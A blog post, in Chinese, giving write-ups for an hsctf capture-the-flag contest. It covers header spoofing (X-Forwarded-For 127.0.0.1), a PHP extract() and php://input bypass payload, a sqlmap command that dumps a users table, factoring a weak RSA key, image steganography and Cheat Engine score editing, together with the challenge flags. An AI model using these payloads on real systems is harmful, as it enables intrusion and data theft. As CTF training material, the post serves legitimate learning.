由于没有多少时间答题,抽空在划水的时候做了一两道题目.比赛已经结束了24小时了。特把写的WP分享一下,欢迎各位大佬进行指点。

文章目录

• warm_up
• 头头是道
• B45364
• EZphp
• easy_sql
• baigeiRSA
• image1
• image2
• image3
• image4
• 2^11

warm_up

只有虔诚的嘉心糖才能成功拿到flag地址：43.248.98.206:10003

GET / HTTP/1.1Host: 43.248.98.206:10003Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Referer:jiaran BiliBiliX-Forwarded-For:127.0.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Connection: close

hsctf{he1_hei_ran_r@n_w0_d3_rAn_Ran_00000000} 

头头是道

有一个清醒的头脑很重要地址：43.248.98.206:10006

hsctf{Mast3rH0ssssT_dI@nQQ}

B45364

WVVoT2FtUkhXamRoUmxVeFRtcHNUMXBHT1V4aFYyeDVXVmRHUTJKSGVGTlpXREJMQ2c9PQo=

三次base64得到flag

hsctf{hU569Nd_KiiraaBllRa}

EZphp

我得想想怎么才能取而代之地址：43.248.98.206:10005

打开页面发现php extract变量覆盖

 <?phpinclude 'flag.php';extract($_GET);if (isset($wsf)) {    $xmm = trim(file_get_contents($zm));    if ($xmm == $wsf) {  //通过传参?wsf=&zm= 绕过        if (!empty($xlq)) {            $xw = trim(file_get_contents($fn));             if ($xlq === $xw) {//通过php://input协议绕过                echo "
$flag
";            } else {                echo '
no no no 
';            }        } else 'You cant do that!!';    } else {        echo 'hacker!!';    }} else {    highlight_file(__FILE__);}?>

payload: ?wsf=&zm=&xlq=fn=2&fn=php://input Post传参:fn=2

flag{phP_lS_th9_be5T_l4ngUa9e}

easy_sql

嘉然，为了你我要打ctf！！！咦？这里这么注入不进去呢？奇怪地址：43.248.98.206:10001

访问之后查看加载发现 id=1

简单测试，发现sql注入

sqlmap一把梭哈。

#因为是时间盲注,所以flag出来之后就直接Ctrl+c了python sqlmap.py -u "http://43.248.98.206:10001/image.php?id=*" -D hsctffinal -T users --dump

baigeiRSA

白给了，白给了，真白给！

下载下来之后的脚本内容

import libnumfrom Crypto.Util import numberfrom secret import flagsize = 128e = 65537p = number.getPrime(size)q = number.getPrime(size)n = p*qm = libnum.s2n(flag)c = pow(m, e, n)print('n = %d' % n)print('c = %d' % c)#同时还有一个输出文件n = 88503001447845031603457048661635807319447136634748350130947825183012205093541c = 40876621398366534035989065383910105526025410999058860023908252093679681817257

在已知e,N,c的情况下,其他不管了，直接yafu分解N，得到p,q 如下P39 = 322368694010594584041053487661458382819P39 = 274539690398523616505159415195049044439

直接脚本,网上脚本,不过原脚本有问题,然后稍作修改，删除了没有用的代码.结果如下

import gmpy2from Crypto.Util.number import long_to_bytese=65537c=40876621398366534035989065383910105526025410999058860023908252093679681817257p = 322368694010594584041053487661458382819q = 274539690398523616505159415195049044439n = p*qphi_n = (p-1)*(q-1)d = gmpy2.invert(e,phi_n)m = pow(c,d,n)print(long_to_bytes(m))

得到flag

HSCTF{@Zh3n_Ba1_G3i!@}

image1

图片隐写1

下载下来图片,右键属性,在详细信息中发现flag

image2

图片隐写2

比第一张图要大,猜测图片内插入了其他数据。

但是内容一样,主题部分无flag。直接查看16进制,疑似被隐藏。搜索flag

发现flagflag{5eafbba3-f710-4fcc-9045-0b0a8b581ec5}

image3

之前两个图片占用40k左右.这个图片占用755k.明显不正常

同时图片存在白边，疑似高度存在问题

修改高度后获取flag

flag{2c44e767-e9b4-4b55-b75e-3504b515942f}

image4

大小无异常,但是在16进制中搜索flag发现了第二题的flag,提交失败,在最后发现了zip的内容。存在flag.txt

直接修改后缀为zip,然后打开,获取flag.txt内容

flag{3f0283e0-e5d0-4084-816b-1237718a8630}

2^11

^在sage里又是什么意思呢……？

下载附件后,运行exe,发现是2048

逆向不太会,ida分析半天，伪代码调不出来,于是决定上下科技。

通过CE修改分数,直接显示flag

flag{E1d3sTBrOth3r_CaR0Ilikoule}

来源地址：https://blog.csdn.net/qq_30817059/article/details/127467679